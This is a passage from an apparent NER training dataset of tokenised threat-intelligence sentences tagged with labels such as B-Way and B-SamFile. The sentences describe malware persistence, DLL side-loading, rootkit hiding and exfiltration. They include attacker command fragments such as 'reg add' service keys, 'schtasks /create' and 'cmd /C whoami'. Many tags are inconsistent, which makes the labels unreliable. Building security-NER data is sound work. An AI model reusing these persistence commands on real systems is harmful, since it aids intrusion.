"keys" - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "2001Path", - "to", - "the", - "registry", - "key", - "for", - "the", - "PrintProcessor", - "service" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "paths", - "and", - "registry", - "keys", - "to", - "use" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "can", - "create", - "a", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "service", - "is", - "then", - "created" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "be", - "configured", - "to", - "create", - "a", - "service", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "can", - "create", - "a", - "service", - "or", - "scheduled", - "task." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "persistence", - "is", - "established", - "by", - "using", - "the", - "ITaskService", - "COM", - "interface", - "to", - "create", - "the", - "\\Microsoft\\Windows\\CertificateServicesClient\\NetTask", - "scheduled", - "task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "task", - "will", - "run", - "the", - "DLL", - "hijacking", - "target", - "as", - "SYSTEM", - "at", - "each", - "boot." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "COM", - "interfaces", - "to", - "schedule", - "tasks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "scheduled", - "task", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "service", - "was", - "configured", - "to", - "execute", - "the", - "next", - "step", - "of", - "the", - "installation", - "process", - "by", - "running", - "a", - "legitimate", - "application" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "service", - "is", - "then", - "created", - "to", - "run", - "that", - "module", - "and", - "is", - "immediately", - "started" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "target", - "for", - "DLL", - "side-loading" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "DLL", - "side-loading" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "the", - "malicious", - "library", - "is", - "the", - "same", - "and", - "serves", - "to", - "load", - "and", - "execute", - "shellcode", - "from", - "a", - "file", - "that", - "is", - "stored", - "under", - "the", - "same", - "name", - "as", - "the", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "new", - "process", - "loads", - "the", - "decoy", - "DLL", - "and", - "manually", - "replaces", - "its", - "content", - "in", - "memory", - "with", - "the", - "fcClientDll", - "module", - "(a", - "process", - "known", - "as", - "module", - "stomping", - "or", - "DLL", - "hollowing)," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "DLL", - "Side-Loading", - "to", - "launch", - "its", - "second-stage", - "dropper." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "a", - "task", - "with", - "the", - "same", - "name", - "already", - "exists,", - "it", - "is", - "deleted", - "before", - "the", - "new", - "one", - "is", - "created" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "hijacking", - "the", - "aforementioned", - "drivers,", - "the", - "rootkit", - "erases", - "the", - "DLL", - "names", - "associated", - "with", - "them", - "from", - "internal", - "structures", - "used", - "to", - "display", - "device", - "drivers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Covers", - "its", - "tracks", - "by", - "overwriting", - "the", - "code", - "previously", - "modified", - "by", - "the", - "malicious", - "library", - "with", - "a", - "useless", - "call", - "to", - "lstrlenW." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "removing", - "their", - "entries", - "from", - "the", - "ActiveProcessLinks", - "list", - "of", - "the", - "undocumented", - "KPROCESS", - "kernel", - "structure." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "file", - "is", - "then", - "deleted", - "from", - "the", - "disk" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deletes", - "its", - "rootkit’s", - "executable", - "after", - "launching", - "it." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "starts", - "a", - "suspended", - "process", - "to", - "perform", - "injection", - "on", - "it." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stores", - "collected", - "data", - "in", - "local", - "SQLite", - "databases", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Each", - "manager", - "stores", - "collected", - "data", - "in", - "its", - "own", - "SQLite", - "database,", - "while", - "data", - "that", - "is", - "collected", - "on", - "demand", - "is", - "returned", - "directly", - "to", - "the", - "C&C", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "local", - "caches", - "to", - "stage", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "data", - "can", - "be", - "collected", - "locally", - "by", - "the", - "corresponding", - "class", - "before", - "it", - "is", - "staged", - "for", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "exfiltrate", - "files", - "from", - "local", - "file", - "systems." - ], - "ner_tags": [ - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "corresponding", - "files", - "are", - "collected" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Monitoring", - "file", - "system", - "events", - "to", - "collect", - "new", - "and", - "modified", - "files." - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "search", - "through", - "connected", - "file", - "systems", - "and", - "obtain", - "directory", - "listings." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "walks", - "through", - "all", - "mapped", - "file", - "systems", - "and", - "collects", - "files" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "collects", - "file", - "and", - "directory", - "metadata" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "malicious", - "RTF", - "and", - "DOCX", - "attachments", - "to", - "compromise", - "victims." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sending", - "spearphishing", - "emails", - "with", - "malicious", - "attachments", - "such", - "as", - "RTF", - "documents", - "created", - "via", - "the", - "Royal", - "Road", - "builder" - ], - "ner_tags": [ - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "makes", - "extensive", - "use", - "of", - "the", - "Windows", - "API", - "to", - "execute", - "commands", - "and", - "launch", - "processes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "performs", - "the", - "functions", - "of", - "LoadLibrary", - "and", - "calls", - "the", - "loaded", - "module’s", - "startModule", - "export." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "for", - "function", - "imports", - "(via", - "GetProcAddress)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "perform", - "WMI", - "queries" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "WMI", - "for", - "lateral", - "movement", - "and", - "information", - "gathering." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "runs", - "WMI", - "queries", - "every", - "second", - "to", - "get", - "all", - "process", - "creation", - "and", - "termination", - "events." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "lateral", - "movement", - "scripts", - "such", - "as", - "WMIExec." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "use", - "locally", - "configured", - "proxies." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "use", - "XOR,", - "TEA,", - "RC4", - "and", - "a", - "modified", - "AES", - "algorithm", - "to", - "encrypt", - "traffic", - "and", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "It", - "is", - "encrypted", - "using", - "the", - "AES", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "application", - "and", - "the", - "accompanying", - "relevant", - "and", - "malicious", - "DLL", - "were", - "both", - "embedded", - "in", - "the", - "loader’s", - "resources." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "embedded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "embedded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "also", - "embeds", - "a", - "DLL", - "version", - "of", - "the", - "Pafish", - "(aka", - "Paranoid", - "Fish)", - "sandbox", - "and", - "analysis", - "detection", - "tool", - "as", - "one", - "of", - "its", - "encrypted", - "resources" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "module", - "is", - "embedded", - "in", - "the", - "library’s", - "resource", - "section", - "and", - "encrypted", - "with", - "an", - "algorithm", - "similar", - "to", - "RC4" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "function", - "used", - "to", - "encrypt", - "and", - "decrypt", - "the", - "embedded", - "module" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Another", - "component", - "collects", - "information", - "about", - "mapped", - "volumes,", - "including", - "mount", - "point,", - "name,", - "drive", - "type,", - "and", - "disk", - "usage", - "data." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "O", - "O", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "This", - "is", - "sent", - "to", - "the", - "server", - "along", - "with", - "the", - "computer’s", - "name" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "includes", - "bidirectional", - "file", - "transfers", - "between", - "the", - "C&C", - "and", - "the", - "compromised", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "configuration", - "corresponds", - "to", - "resource", - "1000", - "in", - "the", - "initial", - "loader.", - "It", - "defines", - "the", - "address", - "and", - "port", - "for", - "both", - "the", - "exfiltration", - "server", - "(file_server)", - "and", - "the", - "C&C", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "given", - "command", - "line." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "protected", - "with", - "DNGuard,", - "a", - "commercial", - ".NET", - "packer." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "uses", - "both", - "regular", - "and", - "reflective", - "DLL", - "injection." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "proxy/tunneling", - "utilities", - "(HTran,", - "LCX,", - "EarthWorm" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Org", - "B-Org" - ] - }, - { - "tokens": [ - "read", - "from", - "a", - "file", - "on", - "disk", - "or", - "a", - "registry", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "components", - "use", - "registry", - "keys", - "to", - "signal", - "each", - "other." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "it", - "collects", - "usernames" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "usernames" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "directory", - "listings" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "directory", - "listings", - "were", - "harvested", - "as", - "a", - "result." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hostnames" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "machine", - "names" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "execution", - "using", - "scheduled", - "tasks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloaded", - "and", - "run", - "by", - "the", - "plaintext", - "PY", - "files", - "from", - "external", - "infrastructure." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "download", - "and", - "execute", - "yet", - "another", - "Python", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Code", - "responsible", - "for", - "downloading", - "cron_script", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "keylogging", - "functionality." - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "malware", - "hidden", - "inside", - "the", - "Python", - "compiled", - "byte", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malicious", - "code", - "is", - "embedded", - "in", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "unpacking" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Obfuscation", - "is", - "one", - "of", - "the", - "most", - "popular", - "methods", - "to", - "achieve", - "this." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JavaScript", - "obfuscation", - "was", - "used" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "of", - "various", - "obfuscation", - "techniques", - "in", - "malware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "most", - "popular", - "obfuscation", - "techniques", - "is", - "execution", - "of", - "Base64-encoded", - "malicious", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "of", - "W4SP", - "crew", - "obfuscation", - "tools", - "such", - "as", - "Hyperion", - "and", - "Kramer" - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "inspected", - "UEFI", - "firmware", - "was", - "tampered", - "with", - "to", - "embed", - "a", - "malicious", - "code", - "that", - "we", - "dub", - "MoonBounce;" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "be", - "embedded", - "in", - "the", - "loader", - "itself." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "stages", - "execution", - "of", - "further", - "payloads", - "downloaded", - "from", - "the", - "internet" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attempts", - "to", - "fetch", - "another", - "stage", - "of", - "the", - "payload", - "to", - "run", - "in", - "memory," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stage", - "the", - "execution", - "of", - "additional", - "plugins", - "in", - "memory," - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Download", - "a", - "file", - "from", - "the", - "C2", - "server" - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reaching", - "out", - "to", - "the", - "server", - "to", - "obtain", - "a", - "further", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "execution", - "of", - "several", - "functions", - "in", - "the", - "EFI", - "Boot", - "Services", - "Table,", - "namely", - "AllocatePool,", - "CreateEventEx", - "and", - "ExitBootServices" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "using", - "the", - "WinExec", - "API" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "injecting", - "it", - "into", - "an", - "svchost.exe", - "process," - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "injecting", - "it", - "to", - "the", - "address", - "space", - "of", - "another", - "process." - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "injected", - "process" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "encrypted", - "blob" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encrypted", - "ScrambleCross", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "an", - "encrypted", - "configuration", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "facilitates", - "the", - "functionality", - "of", - "WMI", - "in", - "Windows" - ], - "ner_tags": [ - "B-Features", - "O", - "B-Features", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "when", - "the", - "WMI", - "service", - "was", - "initiated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "upon", - "initiation", - "of", - "the", - "WMI", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Usage", - "of", - "WMI", - "for", - "remote", - "command", - "execution" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "wmic", - "/node:<" - ], - "ner_tags": [ - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "It", - "works", - "by", - "decrypting", - "a", - "shellcode", - "BLOB", - "with", - "AES-256" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "through", - "the", - "command", - "line", - "as" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "via", - "a", - "Windows", - "batch", - "script", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "issuing", - "the", - "following", - "command", - "line" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Write", - "text", - "to", - "a", - "given", - "*.bat", - "file", - "and", - "execute", - "it" - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Run", - "a", - "shell", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "examples", - "of", - "command", - "lines" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "executing", - "a", - "launcher", - "utility", - "with", - "the", - "filename", - "System.Mail.Service.dll", - "(MD5:", - "5F9020983A61446A77AF1976247C443D)", - "through", - "the", - "command", - "line", - "as", - "a", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reg", - "add", - "\"HKLM\\SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\Svchost\"" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "reg", - "add", - "\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\iscsiwmi\\Parameters\"" - ], - "ner_tags": [ - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "reg", - "add", - "\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\iscsiwmi\\Parameters\"", - "/" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "second", - "way", - "to", - "execute", - "StealthMutant", - "is", - "through", - "the", - "creation", - "of", - "a", - "scheduled", - "task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "schtasks", - "/create", - "/TN" - ], - "ner_tags": [ - "B-Way", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "schtasks", - "/run" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Both", - "the", - "IP", - "and", - "the", - "server", - "directory", - "path", - "are", - "encrypted", - "with", - "AES-128", - "using", - "a", - "base64", - "encoded", - "key", - "stored", - "in", - "the", - "backdoor’s", - "image." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "commands", - "retrieved", - "from", - "the", - "server", - "are", - "also", - "encrypted", - "with", - "AES-128" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Get", - "list", - "of", - "drives" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Get", - "content", - "list", - "from", - "a", - "specified", - "directory" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/C", - "\"C:", - "&", - "cd", - "\\", - "&", - "dir", - "$temp\\", - "/od\"" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sending", - "back", - "the", - "result", - "of", - "the", - "command’s", - "execution", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/C", - "\"C:", - "&", - "cd", - "\\", - "&", - "whoami\"" - ], - "ner_tags": [ - "B-SamFile", - 